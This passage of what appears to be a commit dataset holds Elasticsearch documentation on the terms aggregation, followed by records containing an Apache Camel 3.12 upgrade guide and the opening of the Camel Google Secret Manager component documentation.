One can\nchange this default behaviour by setting the `size` parameter.\n\n==== Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top `size` term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nThis means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned). If set to `0`, the `size` will be set to `Integer.MAX_VALUE`.\n\n==== Document counts are approximate\n\nAs described above, the document counts (and the results of any sub aggregations) in the terms aggregation are not always\naccurate. This is because each shard provides its own view of what the ordered list of terms should be and these are\ncombined to give a final view. Consider the following scenario:\n\nA request is made to obtain the top 5 terms in the field product, ordered by descending document count from an index with\n3 shards. In this case each shard is asked to give its top 5 terms.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5\n }\n }\n }\n}\n--------------------------------------------------\n\nThe terms for each of the three shards are shown below with their\nrespective document counts in brackets:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n| 6 | Product F (2) | Product H (14) | Product H (28)\n| 7 | Product G (2) | Product I (10) | Product Q (2)\n| 8 | Product H (2) | Product Q (6) | Product D (1)\n| 9 | Product I (1) | Product J (8) |\n| 10 | Product J (1) | Product C (4) |\n\n|=========================================================\n\nThe shards will return their top 5 terms so the results from the shards will be:\n\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n\n|=========================================================\n\nTaking the top 5 results from each of the shards (as requested) and combining them to make a final top 5 list produces\nthe following:\n\n[width=\"40%\",cols=\"^2,^2\"]\n|=========================================================\n\n| 1 | Product A (100)\n| 2 | Product Z (52)\n| 3 | Product C (50)\n| 4 | Product G (45)\n| 5 | Product B (43)\n\n|=========================================================\n\nBecause Product A was returned from all shards we know that its document count value is accurate. 
Product C was only\nreturned by shards A and C so its document count is shown as 50 but this is not an accurate count. Product C exists on\nshard B, but its count of 4 was not high enough to put Product C into the top 5 list for that shard. Product Z was also\nreturned only by 2 shards but the third shard does not contain the term. There is no way of knowing, at the point of\ncombining the results to produce the final list of terms, that there is an error in the document count for Product C and\nnot for Product Z. Product H has a document count of 44 across all 3 shards but was not included in the final list of\nterms because it did not make it into the top five terms on any of the shards.\n\n==== Shard Size\n\nThe higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to\ncompute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data\ntransfers between the nodes and the client).\n\nThe `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined,\nit will determine how many terms the coordinating node will request from each shard. Once all the shards responded, the\ncoordinating node will then reduce them to a final result which will be based on the `size` parameter - this way,\none can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to\nthe client. If set to `0`, the `shard_size` will be set to `Integer.MAX_VALUE`.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will\n override it and reset it to be equal to `size`.\n\nadded[1.1.0] It is possible to not limit the number of terms that are returned by setting `size` to `0`. Don't use this\non high-cardinality fields as this will kill both your CPU since terms need to be return sorted, and your network.\n\n==== Calculating Document Count Error\n\ncoming[1.4.0]\n\nThere are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as\na whole which represents the maximum potential document count for a term which did not make it into the final list of\nterms. This is calculated as the sum of the document count from the last term returned from each shard .For the example\ngiven above the value would be 46 (2 + 15 + 29). This means that in the worst case scenario a term which was not returned\ncould have the 4th highest document count.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52\n },\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\nThe second error value can be enabled by setting the `show_term_doc_count_error` parameter to true. This shows an error value\nfor each term returned by the aggregation which represents the 'worst case' error in the document count and can be useful when\ndeciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for the last term returned\nby all shards which did not return the term. In the example above the error in the document count for Product C would be 15 as\nShard B was the only shard not to return the term and the document count of the last termit did return was 15. 
The actual document\ncount of Product C was 54 so the document count was only actually off by 4 even though the worst case was that it would be off by\n15. Product A, however has an error of 0 for its document count, since every shard returned it we can be confident that the count\nreturned is accurate.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100,\n \"doc_count_error_upper_bound\" : 0\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52,\n \"doc_count_error_upper_bound\" : 2\n },\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\nThese errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is\nordered by the terms values themselves (either ascending or descending) there is no error in the document count since if a shard\ndoes not return a particular term which appears in the results from another shard, it must not have that term in its index. When the\naggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be\ndetermined and is given a value of -1 to indicate this.\n\n==== Order\n\nThe order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by\ntheir `doc_count` descending. It is also possible to change this behaviour as follows:\n\nOrdering the buckets by their `doc_count` in an ascending manner:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"_count\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\nOrdering the buckets alphabetically by their terms in an ascending manner:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"_term\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\n\nOrdering the buckets by single value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"avg_height\" : \"desc\" }\n },\n \"aggs\" : {\n \"avg_height\" : { \"avg\" : { \"field\" : \"height\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\nOrdering the buckets by multi value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"height_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"height_stats\" : { \"stats\" : { \"field\" : \"height\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\nIt is also possible to order the buckets based on a \"deeper\" aggregation in the hierarchy. This is supported as long\nas the aggregations path are of a single-bucket type, where the last aggregation in the path may either by a single-bucket\none or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. 
`doc_count`),\nin case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of\na multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value).\n\nThe path must be defined in the following form:\n\n--------------------------------------------------\nAGG_SEPARATOR := '>'\nMETRIC_SEPARATOR := '.'\nAGG_NAME := <the name of the aggregation>\nMETRIC := <the name of the metric (in case of multi-value metrics aggregation)>\nPATH := <AGG_NAME>[<AGG_SEPARATOR><AGG_NAME>]*[<METRIC_SEPARATOR><METRIC>]\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"address.country\",\n \"order\" : { \"females>height_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"females\" : {\n \"filter\" : { \"term\" : { \"gender\" : { \"female\" }}},\n \"aggs\" : {\n \"height_stats\" : { \"stats\" : { \"field\" : \"height\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above will sort the countries buckets based on the average height among the female population.\n\n==== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tag\",\n \"min_doc_count\": 10\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`.\n\n\nTerms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic.\n\nadded[1.2.0] `shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a resonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it.\n\n\n\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. 
However, some of\n the returned terms which have a document count of zero might only belong to deleted documents, so there is\n no warranty that a `match_all` query would find a positive document count for those terms.\n\nWARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets\n which is less than `size` because not enough data was gathered from the shards. Missing buckets can be\n back by increasing `shard_size`.\n Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count\/#shards`.\n\n[[search-aggregations-bucket-terms-aggregation-script]]\n==== Script\n\nGenerating the terms using a script:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"script\" : \"doc['gender'].value\"\n }\n }\n }\n}\n--------------------------------------------------\n\n==== Value Script\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"script\" : \"'Gender: ' +_value\"\n }\n }\n }\n}\n--------------------------------------------------\n\n\n==== Filtering Values\n\nIt is possible to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on regular expressions.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : \".*sport.*\",\n \"exclude\" : \"water_.*\"\n }\n }\n }\n}\n--------------------------------------------------\n\nIn the above example, buckets will be created for all the tags that has the word `sport` in them, except those starting\nwith `water_` (so the tag `water_sports` will no be aggregated). The `include` regular expression will determine what\nvalues are \"allowed\" to be aggregated, while the `exclude` determines the values that should not be aggregated. 
When\nboth are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`.\n\nThe regular expression are based on the Java(TM) http:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html[Pattern],\nand as such, they it is also possible to pass in flags that will determine how the compiled regular expression will work:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : {\n \"pattern\" : \".*sport.*\",\n \"flags\" : \"CANON_EQ|CASE_INSENSITIVE\" <1>\n },\n \"exclude\" : {\n \"pattern\" : \"water_.*\",\n \"flags\" : \"CANON_EQ|CASE_INSENSITIVE\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> the flags are concatenated using the `|` character as a separator\n\nThe possible flags that can be used are:\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#CANON_EQ[`CANON_EQ`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#CASE_INSENSITIVE[`CASE_INSENSITIVE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#COMMENTS[`COMMENTS`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#DOTALL[`DOTALL`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#LITERAL[`LITERAL`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#MULTILINE[`MULTILINE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNICODE_CASE[`UNICODE_CASE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNICODE_CHARACTER_CLASS[`UNICODE_CHARACTER_CLASS`] and\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNIX_LINES[`UNIX_LINES`]\n\n==== Multi-field terms aggregation\n\nThe `terms` aggregation does not support collecting terms from multiple fields\nin the same document. The reason is that the `terms` agg doesn't collect the\nstring term values themselves, but rather uses\n<<search-aggregations-bucket-terms-aggregation-execution-hint,global ordinals>>\nto produce a list of all of the unique values in the field. Global ordinals\nresults in an important performance boost which would not be possible across\nmultiple fields.\n\nThere are two approaches that you can use to perform a `terms` agg across\nmultiple fields:\n\n<<search-aggregations-bucket-terms-aggregation-script,Script>>::\n\nUse a script to retrieve terms from multiple fields. This disables the global\nordinals optimization and will be slower than collecting terms from a single\nfield, but it gives you the flexibility to implement this option at search\ntime.\n\n<<copy-to,`copy_to` field>>::\n\nIf you know ahead of time that you want to collect the terms from two or more\nfields, then use `copy_to` in your mapping to create a new dedicated field at\nindex time which contains the values from both fields. You can aggregate on\nthis single field, which will benefit from the global ordinals optimization.\n\n==== Collect mode\n\nadded[1.3.0] Deferring calculation of child aggregations\n\nFor fields with many unique terms and a small number of required results it can be more efficient to delay the calculation\nof child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree\nare expanded in one depth-first pass and only then any pruning occurs. 
In some rare scenarios this can be very wasteful and can hit memory constraints.\nAn example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nEven though the number of movies may be comparatively small and we want only 50 result buckets there is a combinatorial explosion of buckets\nduring calculation - a single movie will produce n\u00b2 buckets where n is the number of actors. The sane option would be to first determine\nthe 10 most popular actors and only then examine the top co-stars for these 10 actors. This alternative strategy is what we call the `breadth_first` collection\nmode as opposed to the default `depth_first` mode:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10,\n \"collect_mode\" : \"breadth_first\"\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n\nWhen using `breadth_first` mode the set of documents that fall into the uppermost buckets are\ncached for subsequent replay so there is a memory overhead in doing this which is linear with the number of matching documents.\nIn most requests the volume of buckets generated is smaller than the number of documents that fall into them so the default `depth_first`\ncollection mode is normally the best bet but occasionally the `breadth_first` strategy can be significantly more efficient. Currently\nelasticsearch will always use the `depth_first` collect_mode unless explicitly instructed to use `breadth_first` as in the above example.\nNote that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent\naggregation understands that this child aggregation will need to be called first before any of the other child aggregations.\n\nWARNING: It is not possible to nest aggregations such as `top_hits` which require access to match score information under an aggregation that uses\nthe `breadth_first` collection mode. 
This is because this would require a RAM buffer to hold the float score value for every document and\nthis would typically be too costly in terms of RAM.\n\n[[search-aggregations-bucket-terms-aggregation-execution-hint]]\n==== Execution hint\n\nadded[1.2.0] Added the `global_ordinals`, `global_ordinals_hash` and `global_ordinals_low_cardinality` execution modes\n\ndeprecated[1.3.0] Removed the `ordinals` execution mode\n\nThere are different mechanisms by which terms aggregations can be executed:\n\n - by using field values directly in order to aggregate data per-bucket (`map`)\n - by using ordinals of the field and preemptively allocating one bucket per ordinal value (`global_ordinals`)\n - by using ordinals of the field and dynamically allocating one bucket per ordinal value (`global_ordinals_hash`)\n - by using per-segment ordinals to compute counts and remap these counts to global counts using global ordinals (`global_ordinals_low_cardinality`)\n\nElasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured.\n\n`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution modes\nare significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have\nordinals.\n\n`global_ordinals_low_cardinality` only works for leaf terms aggregations but is usually the fastest execution mode. Memory\nusage is linear with the number of unique values in the field, so it is only enabled by default on low-cardinality fields.\n\n`global_ordinals` is the second fastest option, but the fact that it preemptively allocates buckets can be memory-intensive,\nespecially if you have one or more sub aggregations. It is used by default on top-level terms aggregations.\n\n`global_ordinals_hash` on the contrary to `global_ordinals` and `global_ordinals_low_cardinality` allocates buckets dynamically\nso memory usage is linear to the number of values of the documents that are part of the aggregation scope. 
It is used by default\nin inner aggregations.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"execution_hint\": \"map\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> the possible values are `map`, `global_ordinals`, `global_ordinals_hash` and `global_ordinals_low_cardinality`\n\nPlease note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d76116e92eda974c76de1460d81deb2924385e5b","subject":"CAMEL-16183: Remove <proxy> in old spring xml XSD which is deprecated and no longer in use.","message":"CAMEL-16183: Remove <proxy> in old spring xml XSD which is deprecated and no longer in use.\n","repos":"christophd\/camel,christophd\/camel,adessaigne\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,tadayosi\/camel,tdiesler\/camel,apache\/camel,adessaigne\/camel,tdiesler\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,apache\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_12.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_12.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. 
For example, if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfor both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.11 to 3.12\n\n=== API changes\n\nThe methods `getComponentNames` and `getLanguageNames` on `CamelContext` have changed to\nreturn `Set<String>` instead of `List<String>`.\n\nAdded `getExchangePattern` to `Endpoint`, which is a method that already exists on `DefaultEndpoint`.\nHowever, the method needs to be exposed in the API as well.\n\nThe `ThroughputLogger` has changed the return type from `int` to `long` in the `getReceivedCounter` method.\n\nRemoved the `dataSonnet(Expression)` methods from `RouteBuilder` as they should not be used;\nuse the methods that take `String` as type.\n\n=== Data Formats\n\nThe `camel-asn1` data format has renamed the option `clazzName` to `unmarshalType`.\nThe `camel-avro` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-avro` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-avro` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-cbor` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-cbor` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-jacksonxml` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-jacksonxml` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-jacksonxml` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-json` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-json` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-json` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-protobuf` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-protobuf` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-protobuf` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-yaml` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\n\n=== camel-catalog\n\nRemoved the APIs that return the website documentation in AsciiDoc and HTML format, that is, the methods\nwith the naming pattern `...AsciiDoc` and `...HtmlDoc`.\n\n=== camel-cdi\n\nThe XML DSL with `camel-cdi` has removed the deprecated `<proxy>` functionality.\n\n=== camel-jms\n\nThe `camel-jms` component now better supports Apache Artemis in streaming mode for large messages,\nwhen Artemis is using a pooled connection pool (previously pooling was not supported). Now the option `artemisStreamingEnabled`\nmust explicitly be set to `true` to enable support for Artemis streaming mode. Previously Camel tried to auto-detect this.\n
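\nAs a hedged sketch (the queue name and target endpoint are hypothetical), a route that explicitly opts in to Artemis streaming mode could look like:\n\n[source,java]\n----\nfrom(\"jms:queue:bigFiles?artemisStreamingEnabled=true\")\n .to(\"file:target\/incoming\");\n----\n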
\n=== camel-google-sheets\n\nThe `google-sheets-stream` component has changed the syntax, from: `google-sheets-stream:apiName` to: `google-sheets-stream:spreadsheetId`\n\nThe old `apiName` option was not in use, and therefore it has been replaced with `spreadsheetId`,\nwhich used to be a query parameter.\n\n=== camel-kamelet \/ route templates\n\nKamelet parameters with names such as `host` and `port` are now always used with their configured value.\nBefore, the value in use may have come from an ENV variable with the same name.\n\n=== camel-spark\n\nThe `camel-spark` component has been upgraded from Spark 2.x to 3.x.\n\n=== camel-influxdb\n\nThe `camel-influxdb` component no longer auto-creates the database if it is not present.\nWith CAMEL-16892 we introduced the `checkDatabaseExistence` and `autoCreateDatabase` options for this purpose.\nBoth of the options are `false` by default. So, you'll need to set both to `true` if you want to have the older releases' behavior, or create the database yourself before using the camel component.\n\n=== camel-huawei\n\nAll Huawei Cloud components use AK\/SK as security keys to authenticate against the Huawei Cloud backend services. Initially, AK was mapped to `authenticationKey` in the endpoint class. To be in line with Huawei Cloud's naming conventions, we have renamed this option from `authenticationKey` to `accessKey` for all components. This is a breaking change for users who are already using Huawei Cloud components up to version 3.11.x. ","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.11 to 3.12\n\n=== API changes\n\nThe method `getComponentNames` and `getLanguageNames` on `CamelContext` has changed to\nreturn `Set<String>` instead of `List<String>`.\n\nAdded `getExchangePattern` to `Endpoint` which is a method that already exists on `DefaultEndpoint`.\nHowever the method is needed to be exposed in the API as well.\n\nThe `ThroughputLogger` has changed the return type from `int` to `long` in the `getReceivedCounter` method.\n\nRemoved the `dataSonnet(Expression)` methods from `RouteBuilder` as they should not be used;\nuse the methods that take `String` as type.\n\n=== Data Formats\n\nThe `camel-asn1` data format has renamed the option `clazzName` to `unmarshalType`.\nThe `camel-avro` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-avro` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-avro` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-cbor` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-cbor` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-jacksonxml` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-jacksonxml` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-jacksonxml` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-json` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-json` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-json` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe 
`camel-protobuf` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-protobuf` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-protobuf` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-yaml` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\n\n=== camel-catalog\n\nRemove the APIs to return the website documentation in ascii doc and html format, it is the methods\nwith naming pattern `...AsciiDoc` and `...HtmlDoc`.\n\n=== camel-jms\n\nThe `camel-jms` component now better support Apache Artemis in streaming mode for large messages support,\nwhen Artemis is using a pooled connection pool (previously pooled was not supported). Now the option `artemisStreamingEnabled`\nmust explicit be set to `true` to enable support for Artemis streaming mode. Previously Camel tried to auto-detect this.\n\n=== camel-google-sheets\n\nThe `google-sheets-stream` component has changed the syntax, from: `google-sheets-stream:apiName` to: `google-sheets-stream:spreadsheetId`\n\nThe old `apiName` option was not in use, and therefore it has been replaced with `spreadsheetId`\nwhich used to be query parameter.\n\n=== camel-kamelet \/ route templates\n\nKamelet parameters that are named such as `host`, `port` are now always used with their configured value.\nBefore the value in use may be from an ENV variable with the same name.\n\n=== camel-spark\n\nThe `camel-spark` component has been upgraded from Spark 2.x to 3.x.\n\n=== camel-influxdb\n\nThe `camel-influxdb` won't autocreate the database if not present anymore.\nWith CAMEL-16892 we introduced the checkDatabaseExistence and autoCreateDatabase options for this purpose. \nBoth of the options are false by default. So, you'll need to set both to true if you want to have the older releases behavior, or create the database yourself before using the camel component.\n\n=== camel-huawei\n\nAll Huawei Cloud components use AK\/SK as security keys to authenticate against the hauwei cloud backend services. Initally AK was mapped to authenticationKey in the endpoint class. To be in-line with Huawei Cloud's naming conventions, we have renamed this option from `authenticationKey` to `accessKey` for all components. This is a breaking change for users who are already using huawei cloud components until version 3.11.x. 
","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b99371333186c8e7d8a1aa83c5724d60d351054","subject":"Camel Google Secret Manager: Cleanup documentation","message":"Camel Google Secret Manager: Cleanup documentation\n","repos":"apache\/camel,apache\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,christophd\/camel,cunningt\/camel,apache\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel","old_file":"components\/camel-google\/camel-google-secret-manager\/src\/main\/docs\/google-secret-manager-component.adoc","new_file":"components\/camel-google\/camel-google-secret-manager\/src\/main\/docs\/google-secret-manager-component.adoc","new_contents":"= Google Secret Manager Component\n:doctitle: Google Secret Manager\n:shortname: google-secret-manager\n:artifactid: camel-google-secret-manager\n:description: Manage Google Secret Manager Secrets\n:since: 3.16\n:supportlevel: Stable\n:component-header: Only producer is supported\n\/\/Manually maintained attributes\n:group: Google\n:camel-spring-boot-name: google-secret-manager\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Google Secret Manager component provides access to https:\/\/cloud.google.com\/secret-manager\/[Google Cloud Secret Manager]\n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-google-secret-manager<\/artifactId>\n <!-- use the same version as your Camel core version -->\n <version>x.x.x<\/version>\n<\/dependency>\n\n------------------------------------------------------\n\n[[GoogleSecretManager-AuthenticationConfiguration]]\n\n== Authentication Configuration\n\nGoogle Secret Manager component authentication is targeted for use with the GCP Service Accounts.\nFor more information please refer to https:\/\/github.com\/googleapis\/google-cloud-java#authentication[Google Cloud Authentication].\n\nWhen you have the **service account key** you can provide authentication credentials to your application code.\nGoogle security credentials can be set through the component endpoint:\n\n[source,java]\n--------------------------------------------------------\nString endpoint = \"google-secret-manager:\/\/myCamelFunction?serviceAccountKey=\/home\/user\/Downloads\/my-key.json\";\n--------------------------------------------------------\n\nOr by setting the environment variable `GOOGLE_APPLICATION_CREDENTIALS` 